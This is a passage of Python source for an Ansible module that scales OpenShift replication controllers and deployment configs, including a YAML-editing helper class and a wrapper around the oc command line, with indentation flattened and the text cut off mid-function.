# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import fcntl
import json
import time
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/scale -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_scale
short_description: Manage openshift services through the scale parameters
description:
- Manage openshift services through scaling them.
options:
state:
description:
- State represents whether to scale or list the current replicas
required: true
default: present
choices: ["present", "list"]
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: default
aliases: []
kind:
description:
- The kind of object to scale.
required: false
default: None
choices:
- rc
- dc
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: scale down a rc to 0
oc_scale:
name: my-replication-controller
kind: rc
namespace: openshift-infra
replicas: 0
- name: scale up a deploymentconfig to 2
oc_scale:
name: php
kind: dc
namespace: my-php-app
replicas: 2
'''
# -*- -*- -*- End included fragment: doc/scale -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup_ext=None,
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
if backup_ext is None:
self.backup_ext = ".{}".format(time.strftime("%Y%m%dT%H%M%S"))
else:
self.backup_ext = backup_ext
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def remove_entry(data, key, index=None, value=None, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
if value is not None:
data.pop(value)
elif index is not None:
raise YeditException("remove_entry for a dictionary does not have an index {}".format(index))
else:
data.clear()
return True
elif key == '' and isinstance(data, list):
ind = None
if value is not None:
try:
ind = data.index(value)
except ValueError:
return False
elif index is not None:
ind = index
else:
del data[:]
if ind is not None:
data.pop(ind)
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
fcntl.flock(yfd, fcntl.LOCK_EX | fcntl.LOCK_NB)
yfd.write(contents)
fcntl.flock(yfd, fcntl.LOCK_UN)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, '{}{}'.format(self.filename, self.backup_ext))
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
if self.content_type == 'yaml':
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
elif self.content_type == 'json':
Yedit._write(self.filename, json.dumps(self.yaml_dict, indent=4, sort_keys=True))
else:
raise YeditException('Unsupported content_type: {}.'.format(self.content_type) +
'Please specify a content_type of yaml or json.')
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. {}'.format(err))
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path, index=None, value=None):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, index, value, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
'value=[{}] type=[{}]'.format(value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is None:
return (False, self.yaml_dict)
# When path equals "" it is a special case.
# "" refers to the root of the document
# Only update the root path (entire document) when its a list or dict
if path == '':
if isinstance(result, list) or isinstance(result, dict):
self.yaml_dict = result
return (True, self.yaml_dict)
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is not None:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.safe_load(str(invalue))
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
# There is a special case where '' will turn into None after yaml loading it so skip
if isinstance(inc_value, str) and inc_value == '':
pass
# If vtype is not str then go ahead and attempt to yaml load it.
elif isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.safe_load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming value. ' +
'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))
return inc_value
@staticmethod
def process_edits(edits, yamlfile):
'''run through a list of edits and process them one-by-one'''
results = []
for edit in edits:
value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
if edit.get('action') == 'update':
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(
Yedit.parse_value(edit.get('curr_value')),
edit.get('curr_value_format'))
rval = yamlfile.update(edit['key'],
value,
edit.get('index'),
curr_value)
elif edit.get('action') == 'append':
rval = yamlfile.append(edit['key'], value)
else:
rval = yamlfile.put(edit['key'], value)
if rval[0]:
results.append({'key': edit['key'], 'edit': rval[1]})
return {'changed': len(results) > 0, 'results': results}
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params):
'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=params['src'],
backup=params['backup'],
content_type=params['content_type'],
backup_ext=params['backup_ext'],
separator=params['separator'])
state = params['state']
if params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and state != 'present':
return {'failed': True,
'msg': 'Error opening file [{}]. Verify that the '.format(params['src']) +
'file exists, that it is has correct permissions, and is valid yaml.'}
if state == 'list':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['key']:
rval = yamlfile.get(params['key'])
return {'changed': False, 'result': rval, 'state': state}
elif state == 'absent':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['update']:
rval = yamlfile.pop(params['key'], params['value'])
else:
rval = yamlfile.delete(params['key'], params['index'], params['value'])
if rval[0] and params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': state}
elif state == 'present':
# check if content is different than what is in the file
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
params['value'] is None:
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
yamlfile.yaml_dict = content
# If we were passed a key, value then
# we enapsulate it in a list and process it
# Key, Value passed to the module : Converted to Edits list #
edits = []
_edit = {}
if params['value'] is not None:
_edit['value'] = params['value']
_edit['value_type'] = params['value_type']
_edit['key'] = params['key']
if params['update']:
_edit['action'] = 'update'
_edit['curr_value'] = params['curr_value']
_edit['curr_value_format'] = params['curr_value_format']
_edit['index'] = params['index']
elif params['append']:
_edit['action'] = 'append'
edits.append(_edit)
elif params['edits'] is not None:
edits = params['edits']
if edits:
results = Yedit.process_edits(edits, yamlfile)
# if there were changes and a src provided to us we need to write
if results['changed'] and params['src']:
yamlfile.write()
return {'changed': results['changed'], 'result': results['results'], 'state': state}
# no edits to make
if params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': state}
# We were passed content but no src, key or value, or edits. Return contents in memory
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
return {'failed': True, 'msg': 'Unkown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, edits=None, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
updated = False
if content is not None:
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
updated = True
elif edits is not None:
results = Yedit.process_edits(edits, yed)
if results['changed']:
updated = True
if updated:
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, name=None, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
elif name is not None:
cmd.append(name)
else:
raise OpenShiftCLIError('Either name or selector is required when calling delete.')
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
cmd.append('-p')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, name=None, selector=None, field_selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
if field_selector is not None:
cmd.append('--field-selector={}'.format(field_selector))
# Name cannot be used with selector or field_selector.
if selector is None and field_selector is None and name is not None:
cmd.append(name)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
# Ensure results are retuned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
cmd.append('--schedulable={}'.format(schedulable))
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
if grace_period:
cmd.append('--grace-period={}'.format(int(grace_period)))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
elif self.namespace is not None and self.namespace.lower() not in ['none', 'emtpy']: # E501
cmds.extend(['-n', self.namespace])
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"cmd": ' '.join(cmds)}
if output_type == 'json':
rval['results'] = {}
if output and stdout:
try:
rval['results'] = json.loads(stdout)
except ValueError as verr:
if "No JSON object could be decoded" in verr.args:
rval['err'] = verr.args
elif output_type == 'raw':
rval['results'] = stdout if output else ''
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if 'err' in rval or returncode != 0:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class Utils(object): # pragma: no cover
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(str(contents))
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get openshift version in Openshift 3.2
# By default "oc version in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
version = version[1:] # Remove the 'v' prefix
versions_dict[tech + '_numeric'] = version.split('+')[0]
# "3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = "{}.{}".format(*version.split('.'))
return versions_dict
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import rpm
transaction_set = rpm.TransactionSet()
rpmquery = transaction_set.dbMatch("name", "atomic-openshift")
return rpmquery.count() > 0
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
